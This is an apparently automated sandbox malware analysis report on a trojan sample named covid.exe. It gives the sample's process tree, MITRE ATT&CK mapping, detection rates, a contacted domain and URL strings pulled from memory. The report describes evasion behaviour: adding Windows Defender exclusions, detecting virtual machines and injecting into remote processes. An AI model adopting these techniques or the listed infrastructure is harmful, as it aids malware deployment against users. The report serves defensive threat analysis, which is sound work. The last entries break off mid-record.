Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe | Process created: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /SpecialRun 4101d8 6224
Source: C:\Users\user\Desktop\covid.exe | Queries volume information: C:\Users\user\Desktop\covid.exe VolumeInformation
Source: C:\Users\user\Desktop\covid.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\covid.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\covid.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\covid.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,
Source: C:\Users\user\Desktop\covid.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 11 | Application Shimming 1 | Exploitation for Privilege Escalation 1 | Disable or Modify Tools 11 | OS Credential Dumping | File and Directory Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Native API 1 | Windows Service 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 1 | LSASS Memory | System Information Discovery 23 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Command and Scripting Interpreter 1 | Logon Script (Windows) | Access Token Manipulation 1 | Obfuscated Files or Information 2 | Security Account Manager | Query Registry 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Service Execution 2 | Logon Script (Mac) | Windows Service 1 | Timestomp 1 | NTDS | Security Software Discovery 121 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 2 | SIM Card Swap |  | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Process Injection 11 | Masquerading 1 | LSA Secrets | Virtualization/Sandbox Evasion 141 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion 141 | Cached Domain Credentials | Process Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Access Token Manipulation 1 | DCSync | Application Window Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection 11 | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue

Behavior Graph

Behavior Graph ID: 393947 | Sample: covid.exe | Start date: 20/04/2021 | Architecture: WINDOWS | Score: 68

Signatures on the start node: Multi AV Scanner detection for domain / URL; Multi AV Scanner detection for submitted file; Machine Learning detection for sample

Process tree recovered from the graph:
  • covid.exe (started)
      DNS/IP: mmwrlridbhmibnr.ml 172.67.220.147, 49702, 80 CLOUDFLARENETUS United States
      Dropped: C:\Users\user\AppData\Local\...\covid.exe.log (ASCII); 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe (PE32); C:\Users\user\AppData\...\AdvancedRun.exe (PE32)
      Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Adds a directory exclusion to Windows Defender
      • AdvancedRun.exe (started)
          • AdvancedRun.exe (started); DNS/IP: 192.168.2.1 unknown unknown
      • powershell.exe (started)
          • conhost.exe (started)
      • powershell.exe (started)
          • conhost.exe (started)
      • 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe (started)
          • 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe (started)


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
covid.exe | 41% | Virustotal | -
covid.exe | 9% | Metadefender | -
covid.exe | 34% | ReversingLabs | Win32.Trojan.AgentTesla
covid.exe | 100% | Joe Sandbox ML | -

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | 3% | Metadefender | -
C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe | 3% | Metadefender | -
C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe | 0% | ReversingLabs | -

Unpacked PE Files

Source | Detection | Scanner | Label
0.0.covid.exe.460000.0.unpack | 100% | Avira | HEUR/AGEN.1101074

Domains

Source | Detection | Scanner | Label
mmwrlridbhmibnr.ml | 5% | Virustotal | -

URLs

Source | Detection | Scanner | Label
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818. | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg | 0% | URL Reputation | safe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668 | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02- | 0% | URL Reputation | safe
https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837 | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690 | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803. | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03- | 0% | URL Reputation | safe
https://www.liverpool.com/all-about/premier-league | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03- | 0% | URL Reputation | safe
https://www.liverpool.com/liverpool-fc-news/ | 0% | URL Reputation | safe
https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154 | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837. | 0% | URL Reputation | safe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850 | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02 | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png | 0% | URL Reputation | safe
https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876 | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg | 0% | URL Reputation | safe
https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166 | 0% | URL Reputation | safe
https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
mmwrlridbhmibnr.ml | 172.67.220.147 | true | false | - | unknown

Contacted URLs

http://mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A70E3BA9C56C3F44E5DAA4E51EAD00CB.html
  • Malicious: true
  • Antivirus detection: 8%, Virustotal; Avira URL Cloud: safe
  • Reputation: unknown

http://mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-8D0E09CE9EC742EC93B6C666F9ACD863.html
  • Malicious: false
  • Antivirus detection: Avira URL Cloud: safe
  • Reputation: unknown

URLs from Memory and Binaries

Source keys used in the table below (memory dumps and dropped files the string was found in):
  • [1] covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp
  • [2] covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp
  • [3] AdvancedRun.exe, 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
  • [4] 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000013.00000002.323823436.000000000040C000.00000002.00020000.sdmp
  • [5] 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000015.00000002.322563501.000000000040C000.00000002.00020000.sdmp
  • [6] 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.dr
  • [7] powershell.exe, 0000000F.00000002.434270179.00000000049C1000.00000004.00000001.sdmp
  • [8] powershell.exe, 00000010.00000003.387988534.0000000007851000.00000004.00000001.sdmp

Name | Source | Malicious | Antivirus Detection | Reputation
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818. | [1] | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg | [1] | false | URL Reputation: safe | unknown
https://c.amazon-adsystem.com/aax2/apstag.js | [1] | false | - | high
https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668 | [1] | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02- | [1] | false | URL Reputation: safe | unknown
https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837 | [1] | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690 | [1], [2] | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803. | [1] | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp | [1], [2] | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03- | [1] | false | URL Reputation: safe | unknown
https://www.liverpool.com/all-about/premier-league | [1], [2] | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg | [1], [2] | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png | [1], [2] | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03- | [1] | false | URL Reputation: safe | unknown
https://www.liverpool.com/liverpool-fc-news/ | [1] | false | URL Reputation: safe | unknown
https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154 | [1] | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837. | [1], [2] | false | URL Reputation: safe | unknown
https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850 | [1] | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02 | [1] | false | URL Reputation: safe | unknown
http://www.nirsoft.net/ | [3], [4], [5], [6] | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | [7] | false | - | high
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg | [1], [2] | false | URL Reputation: safe | unknown
https://ads.pubmatic.com/AdServer/js/pwt/156997/3236/pwt.js | [1] | false | - | high
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png | [1], [2] | false | URL Reputation: safe | unknown
https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876 | [1] | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | [8] | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | [8] | false | - | high
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg | [1], [2] | false | URL Reputation: safe | unknown
https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166 | [2] | false | URL Reputation: safe | unknown
https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst | [1] | false | URL Reputation: safe | unknown
https://reachplc.hub.loginradius.com&quot; | [1] | false | Avira URL Cloud: safe | low
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png | [1], [2] | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03- | [1] | false | URL Reputation: safe | unknown
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | [6] | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818. | [1] | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690 | [1], [2] | false | URL Reputation: safe | unknown
https://s2-prod.liverpool.com | [2] | false | URL Reputation: safe | unknown
https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816 | [2] | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837 | [1], [2] | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | [8] | false | - | high
https://i2-prod.liverpool.com | [2] | false | URL Reputation: safe | unknown
https://felix.data.tm-awx.com/felix.min.js | [1] | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpg | [1], [2] | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03- | [1] | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpg | [1], [2] | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690. | [1] | false | URL Reputation: safe | unknown
https://www.liverpool.com/all-about/ozan-kabak | [1], [2] | false | URL Reputation: safe | unknown
https://s2-prod.mirror.co.uk/ | [1] | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02- | [1] | false | URL Reputation: safe | unknown
https://www.liverpool.com/all-about/champions-league | [1] | false | URL Reputation: safe | unknown
https://www.liverpool.com/all-about/curtis-jones | [1], [2] | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03- | [1] | false | URL Reputation: safe | unknown
https://www.liverpool.com/all-about/steven-gerrard | [1] | false | URL Reputation: safe | unknown
https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616 | [2] | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03- | [1] | false | URL Reputation: safe | unknown
https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391 | [1] | false | URL Reputation: safe | unknown
http://schema.org/NewsArticle | [1] | false | - | high
https://www.liverpool.com/schedule/ | [1] | false | URL Reputation: safe | unknown
http://schema.org/BreadcrumbList | [1] | false | - | high
https://securepubads.g.doubleclick.net/tag/js/gpt.js | [1] | false | - | high
http://ocsp.sectigo.com0 | [6] | false | URL Reputation: safe | unknown
https://s2-prod.liverpool.com/ | [2] | false | URL Reputation: safe | unknown
https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194 | [1], [2] | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-1231353837 | [1], [2] | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s458/0_GettyImages-1302496803. | [1] | false | (entry cut off in source) | (entry cut off in source)
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://felix.data.tm-awx.com/ampconfig.json&quot;covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690.covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-02covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-19946covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
